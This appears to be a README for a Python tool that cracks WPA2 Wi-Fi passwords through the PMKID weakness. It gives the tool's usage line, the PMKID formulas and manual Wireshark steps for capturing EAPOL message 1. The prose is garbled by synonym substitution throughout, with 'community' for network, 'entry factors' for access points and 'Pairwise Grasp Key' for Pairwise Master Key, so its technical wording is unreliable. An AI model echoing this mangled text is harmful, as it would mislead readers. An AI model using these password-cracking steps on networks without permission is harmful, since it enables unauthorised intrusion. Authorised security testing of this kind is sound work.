This program is a software written in Python to get well the pre-shared key of a WPA2 WiFi community with none de-authentication or requiring any purchasers to be on the community. It targets the weak spot of sure entry factors promoting the PMKID worth in EAPOL message 1.
Program Utilization
python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Non-compulsory)>
NOTE: apmac, clientmac, pmkid have to be a hexstring, e.g b8621f50edd9
How PMKID is Calculated
The 2 most important formulation to acquire a PMKID are as follows:
- Pairwise Grasp Key (PMK) Calculation: passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations
- PMKID Calculation: HMAC-SHA1[pmk + (“PMK Name” + bssid + clientmac)]
That is only for understanding, each are already applied in find_pw_chunk
and calculate_pmkid
.
Acquiring the PMKID
Under are the steps to acquire the PMKID manually by inspecting the packets in WireShark.
*You might use Hcxtools or Bettercap to shortly receive the PMKID with out the beneath steps. The handbook approach is for understanding.
To acquire the PMKID manually from wireshark, put your wi-fi antenna in monitor mode, begin capturing all packets with airodump-ng or comparable instruments. Then connect with the AP utilizing an invalid password to seize the EAPOL 1 handshake message. Observe the following 3 steps to acquire the fields wanted for the arguments.
Open the pcap in WireShark:
- Filter with
wlan_rsna_eapol.keydes.msgnr == 1
in WireShark to show solely EAPOL message 1 packets. - In EAPOL 1 pkt, Increase IEEE 802.11 QoS Information Discipline to acquire AP MAC, Shopper MAC
- In EAPOL 1 pkt, Increase 802.1 Authentication > WPA Key Information > Tag: Vendor Particular > PMKID is beneath
If entry level is weak, you need to see the PMKID worth just like the beneath screenshot:
Demo Run
Disclaimer
This software is for instructional and testing functions solely. Don’t use it to use the vulnerability on any community that you don’t personal or have permission to check. The authors of this script aren’t accountable for any misuse or injury brought on by its use.